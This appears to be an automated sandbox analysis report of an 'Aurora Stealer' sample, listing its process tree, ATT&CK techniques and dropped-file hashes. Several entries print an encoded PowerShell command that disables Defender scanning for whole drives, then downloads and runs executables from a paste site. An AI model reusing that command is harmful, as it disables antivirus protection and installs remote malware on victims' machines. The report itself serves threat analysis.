4⤵
PID:5932

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5916 -childID 5 -isForBrowser -prefsHandle 5836 -prefMapHandle 5840 -prefsLen 27130 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec5846be-7dd6-4620-b7b5-022ccb4f9c3f} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" tab
4⤵
PID:5944

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5264

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\AURORA STEALER\" -spe -an -ai#7zMap29288:108:7zEvent5361
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5392

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\AURORA STEALER\" -spe -an -ai#7zMap28592:108:7zEvent17756
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3128

C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe
"C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:4984

C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
"C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe"
2⤵
- Executes dropped EXE
PID:2940

C:\Users\Admin\AppData\Local\Temp\black.exe
"C:\Users\Admin\AppData\Local\Temp\black.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:3692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbABoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBqAHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYwBsAGUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBrAG0AIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHMAYgA1ADQAZAAyAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBxAHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAYQBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHgAegB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBsAGwAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGoAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBlAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHYAZgBqACMAPgA="
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2448

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2028

C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe
"C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:3676

C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
"C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4516

C:\Users\Admin\AppData\Local\Temp\black.exe
"C:\Users\Admin\AppData\Local\Temp\black.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbABoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBqAHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYwBsAGUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBrAG0AIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHMAYgA1ADQAZAAyAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBxAHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAYQBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHgAegB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBsAGwAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGoAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBlAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHYAZgBqACMAPgA="
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5920

C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe
"C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:2436

C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
"C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe"
2⤵
- Executes dropped EXE
PID:5844

C:\Users\Admin\AppData\Local\Temp\black.exe
"C:\Users\Admin\AppData\Local\Temp\black.exe"
2⤵
- Executes dropped EXE
PID:5940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbABoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBqAHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYwBsAGUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBrAG0AIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHMAYgA1ADQAZAAyAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBxAHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAYQBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHgAegB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBsAGwAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGoAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBlAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHYAZgBqACMAPgA="
3⤵
- Command and Scripting Interpreter: PowerShell
PID:1032

C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe
"C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe"
1⤵
PID:3480

C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
"C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe"
2⤵
PID:3632

C:\Users\Admin\AppData\Local\Temp\black.exe
"C:\Users\Admin\AppData\Local\Temp\black.exe"
2⤵
PID:3464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbABoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBqAHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYwBsAGUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBrAG0AIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHMAYgA1ADQAZAAyAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBxAHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAYQBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHgAegB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBsAGwAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGoAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBlAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHYAZgBqACMAPgA="
3⤵
- Command and Scripting Interpreter: PowerShell
PID:2576

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\black.exe.log
Filesize
226B

MD5
28d7fcc2b910da5e67ebb99451a5f598

SHA1
a5bf77a53eda1208f4f37d09d82da0b9915a6747

SHA256
2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

SHA512
2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
66898dbf1d1f32af63256328731f2c9e

SHA1
21f5828b21fae6d81e57a11e113440c95e1752de

SHA256
258ea4ccbc181f6b86d3a819981d9cf526950f1aa7517b12cda14b856aad8c90

SHA512
65ab1f1224ba418a733b6fe9aecead3c97cb92bf236ffddd77ab70361d81d3d02c24e45c7db1019724d52a0556e2248ed23f696cb49b970efce0bba1666b5e94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
02a1a26525c65a359d41483180eaa6f7

SHA1
c0e2578b92d20e925c1c87016d1a9fccee1ec56f

SHA256
d0ec351493bdbc6cb94990b162bb8be5b0217277cc55ae12aa3c7ea704cdbc6e

SHA512
d3271137241553f8316fcfc94dcf88c2887ee7bb0babddb4c1666fb5ae821a28425400299281422a4ebeb1f4c7369443b839d10f182279504bbba5f2f1cd94c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
75b4b2eecda41cec059c973abb1114c0

SHA1
11dadf4817ead21b0340ce529ee9bbd7f0422668

SHA256
5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134

SHA512
87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626

Download Submit
C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
Filesize
25.4MB

MD5
ad9aa927339dc830a38021afbe20a85f

SHA1
8017bea5f073064a27f61390ce6433cc110f55ea

SHA256
6815733e84bc19b0e7d24533f6295c929cd48be501b226e3a9fd12806a7a4e71

SHA512
43d95d09404f4407083f25ac59f9c31855ed715309037be6ba9e05d26af3ee073e786ee2d12f72f3e1fedebf8529c8b31dc2b7e485ab08b7e21fce2abcf260fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
Filesize
10.2MB

MD5
1f63351aae774ff5ba57f7a15c3653f6

SHA1
85be2129f73a0dcc4fc3952cee70c3457372587e

SHA256
5cc2221f2fa692310c595cfe40c81d917b45b96de0b26c71513c5a71415bddc0

SHA512
599d91ca5eda5e62794fff22c1a53582c52f8db68ef5aeec390722bf9ff004ec66204db83a61f57bec65a49da0205cc644f5e12cf368e0e2063bb9255f529ace

Download Submit
C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ajwaw4ox.p2y.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\black.exe
Filesize
74KB

MD5
b755c4a6af6e4616b7174e9184d4bd01

SHA1
e856e899dcd618263c28ed7f635b2a95746564a2

SHA256
7bfc325de2e448380fe3ae921dddd5b4ab94432d60487d662d7b10ef2b248969

SHA512
def7a5405fda0692f8bf7dbc7cfb67e2e38c6a3391b52209cf73b43b2773216e7bc399e8449d752db6fa6910387f22d7a2cd2a543f30983d13603f75a52345f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon
Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\AlternateServices.bin
Filesize
8KB

MD5
d98b5816d25a9ff21331aec0f06967cd

SHA1
04783df479987c770a658e96a409265cdaca28b9

SHA256
ba6f7fec1d5db5d6b0474e58d189c2383532177e5f9c7d1610acd8b5fae88c1e

SHA512
764fd4111ffe9433808ca3ac21136d65b04db5f3c0c665c2345d9a3a97f7de1393b8b7b354623c68f70e50a25cdea2bed449d60fc7da2bacdd35f6858ac4deb8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\datareporting\glean\db\data.safe.tmp
Filesize
6KB

MD5
62e3dd9b224462ec84e215cdd527737b

SHA1
84d94e3817a8a87e8e25f3c900c6bae55e059e79

SHA256
b753e4e348144dc8c81ee2d042178cc3a2ec7da739c258c171014d24b70cfef3

SHA512
2fb14284314a3ed8ecc48905085ec7ac7b4bc0be023d029bb9b614a2c7da06e12d7d6808b549ca4e1b5743c281cbb79bb9535118fcf2ab086429b8af43d57f97

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\datareporting\glean\db\data.safe.tmp
Filesize
5KB

MD5
ee25d04535607eeb2724f43d956a1e79

SHA1
c46b08cb8228589bf3a294a8c23f84ad944b0d81

SHA256
497e6f19b932a82154732ba68267d1f169e1fd7d9dcea93a2ceab244a6cccb89

SHA512
0a822ddfe4cfb36f76f4251467323391e33c7893f575b3ef259eb3ef239be63381e6db93d85525c92186e80c19fb979c0717b9234cb6fd4acb91cdbf4b370563

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\datareporting\glean\pending_pings\016f1fb2-f953-4559-b1de-f1feeb3cf6d5
Filesize
982B

MD5
704e5b85eca4aae83c54976ada9c5265

SHA1
518d0616ef28c686e89c2304486cdcb3353f577f

SHA256
552a44e986a834ff6f2e7a0c96dcb0fd8d010df2095e524a517f1f05cfb9ff04

SHA512
d92a74e95e9d6c6b7876b790bd3a7cc06a16ca88fb5edaad6c23c29d046869b39034dfff705a1f15e8e25c48535b30aaefe4f74ce4b22012ddaca58a4867bf27

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\datareporting\glean\pending_pings\36692877-92f2-4f44-93c4-05ba8738f84e
Filesize
26KB

MD5
c522c04bc98276e9c7b4764a57f8c4fa

SHA1
d75e25805b5e2101b4e3ab5f8eab14aa7eef98ef

SHA256
80a2c08546c87a2e1406062f21aca292be233c0a1fb813244cf3242c719fa2e7

SHA512
fa37be3e409e21588f917514ae236d37c753896b49087d02705db4361a43d972ea359a5f87a4f3dbe7015a3ce76fe452a56361f1316aeef5b892e27f2ac53bd7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\datareporting\glean\pending_pings\e8c00e6e-16fd-4040-9f11-e012c4fd620f
Filesize
671B

MD5
aafde1f36659bba4538167e39fa1ba63

SHA1
211f6eca134683b5e0480e37feb9769bc82a278b

SHA256
0877e375ba02939ee89a468b98d3c9bc15ae9430492bdc630665c4b000bc98fc

SHA512
2747614f7537eb65828682a548e9adab7989922ba0a6aebdd57857d0888725fe350dd90a483a90bdcd991ac0bc648a8080a3cac111f326f350bb4bbd09b334af

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zirruo9e.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
